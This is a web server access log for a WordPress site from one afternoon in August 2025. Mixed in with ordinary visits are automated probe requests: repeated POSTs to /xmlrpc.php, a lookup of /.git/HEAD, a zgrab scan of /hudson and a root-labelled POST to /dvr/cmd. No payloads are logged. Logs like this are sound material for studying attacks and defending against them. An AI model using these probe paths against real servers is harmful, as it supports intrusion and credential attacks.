149.50.103.48 - - [18/Aug/2025:13:22:31 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
49.51.245.241 - - [18/Aug/2025:13:25:28 +0800] "GET / HTTP/1.1" 200 33390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
172.104.21.10 - - [18/Aug/2025:13:27:42 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
223.89.15.2 - - [18/Aug/2025:13:33:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
183.218.52.48 - - [18/Aug/2025:13:33:10 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
223.89.15.2 - - [18/Aug/2025:13:33:11 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
223.89.15.2 - - [18/Aug/2025:13:33:11 +0800] "GET / HTTP/1.1" 200 33388 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [18/Aug/2025:13:46:01 +0800] "POST /wp-cron.php?doing_wp_cron=1755495961.8216340541839599609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
192.140.57.241 - - [18/Aug/2025:13:46:02 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
178.128.60.116 - - [18/Aug/2025:13:51:02 +0800] "GET /.git/HEAD HTTP/1.1" 404 9423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0"
34.64.218.102 - - [18/Aug/2025:14:05:29 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
91.224.92.17 - - [18/Aug/2025:14:16:50 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
43.153.27.244 - - [18/Aug/2025:14:17:49 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.27.244 - - [18/Aug/2025:14:17:51 +0800] "GET / HTTP/1.1" 200 33390 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
149.50.103.48 - - [18/Aug/2025:14:22:48 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.120.191.6 - - [18/Aug/2025:14:23:02 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
162.241.174.216 - - [18/Aug/2025:14:26:26 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
60.163.50.119 - - [18/Aug/2025:14:27:05 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.8"
45.156.87.165 - root [18/Aug/2025:14:27:15 +0800] "POST /dvr/cmd HTTP/1.1" 499 0 "-" "Mozilla/5.0 (bang2012@protonmail.com)"
123.144.165.67 - - [18/Aug/2025:14:27:36 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.39"
123.144.165.67 - - [18/Aug/2025:14:27:36 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.39"
36.133.115.36 - - [18/Aug/2025:14:47:41 +0800] "POST /wp-cron.php?doing_wp_cron=1755499661.2476689815521240234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
75.119.221.53 - - [18/Aug/2025:14:47:41 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
20.127.187.7 - - [18/Aug/2025:14:50:17 +0800] "GET /hudson HTTP/1.1" 404 9423 "-" "Mozilla/5.0 zgrab/0.x"
183.134.59.131 - - [18/Aug/2025:14:51:21 +0800] "GET / HTTP/1.1" 200 33389 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
183.134.59.131 - - [18/Aug/2025:14:53:31 +0800] "GET / HTTP/1.1" 200 33389 "-" "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
